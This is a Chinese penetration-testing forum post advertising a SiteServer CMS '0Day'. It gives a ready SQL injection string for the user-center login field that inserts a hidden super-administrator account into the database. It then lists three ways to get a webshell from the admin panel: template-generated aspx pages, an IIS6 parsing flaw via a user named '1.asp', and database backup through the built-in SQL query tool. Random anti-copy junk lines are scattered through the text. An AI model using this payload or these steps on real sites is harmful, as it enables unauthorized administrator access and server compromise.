中国网络渗透测试联盟
标题:
SiteServer CMS 0Day
[打印本页]
作者:
admin
时间:
2013-1-11 21:10
标题:
SiteServer CMS 0Day
经测试秒杀最新的3.5版
# q% n. ?& p0 H% s
( B$ D9 S. q) Y3 I
stieserver官网:
www.siteserver.cn
* t7 R$ l' L; Y# B7 |2 z- \! \4 m
- R; p; C6 W4 B2 p+ c! }( ]8 \
+ D" `$ a8 T- h
/ e1 E# A# C7 y1 @) e
EXP:
) O, ~( M5 |0 W/ e7 V! a
% M% o! U c3 B, \$ s7 [; T8 l& m- L
直接访问UserCenter/login.aspx
& g, a7 P! L2 b" Q) m) b% }
7 |9 \4 D, ^$ R+ H( l- j9 ~$ F' _
. S6 Y5 V1 H1 Q' D- o3 h" B3 X# G
4 w# y. p- {6 [; K5 D
用户名处输入:
2 r3 }& T. s5 J# k- j/ b- j" \4 z
3 z3 v6 J* \( N7 U2 B& }
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
+ e# y {' H, \9 [- c
' R3 \0 P1 H3 R/ h7 \! y
! W( [) r& K) O: J4 B0 L
8 @. u) c# t6 M1 q. Z* t) z0 Z
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
) O6 M8 H# C s- O
0 `- R4 `# @( M
( o8 L) r/ }, e, m1 N
( I* Y: }$ |; ~' w% y% m
之后再访问后台SiteServer/login.aspx用插入的用户登陆
$ f6 E4 i1 B1 U: s( Z
: V& S% Z& J- c/ O
. T2 X* `5 p$ f: W+ L6 }
' ]5 G* I4 x6 f/ g
后台拿webshell的三种方法:
( J x, I) y2 K3 s+ g$ G9 G
& |. P7 d, J3 U
一、
7 l7 u9 v, V! [0 ^/ G* W1 X
3 b; ]5 Q! T$ H) f
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
$ q4 B- v R& H
3 Q$ ]1 H, Z, o# b8 R
二、
; @% y$ c9 h/ m# _' F
+ ]; a- x2 Y: p; F3 v
成员权限-》添加用户-》用户名为:1.asp
' O& w W0 v, m
0 c" T/ Q1 g- P4 p3 U) Z( o% Q2 u
http://127.0.0.1/usercenter/
; I0 A, d% e% g6 s
' a1 |: ^" U9 ]7 t4 F% u
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
& k' r: O' F3 K0 K0 D& z7 C
' s& a$ R7 W. l1 h
(ps:后台添加用户时不会验证是否含有非法字符)
: @$ I' s/ q. ^, A
* T+ X: Q4 e( `4 _7 Q; _2 a' q
三、
3 c; Y& K$ h2 D' [& \: X
/ S( k7 V6 z4 ^( I9 Q
系统工具-》实用工具-》机器参数查看
$ H' ?) g3 S' }. D! _2 f9 q
可以看到数据库类型、名称,WEB路径
" ?6 `! c& C& h6 @
. |; J" G) p3 K/ U$ `- g
系统工具-》数据库工具-》SQL语句查询
6 M2 T/ u$ ^. b& v8 x' `
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
2 f5 U0 D: J7 N2 v$ @
" m7 g8 E( P9 D$ v W
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2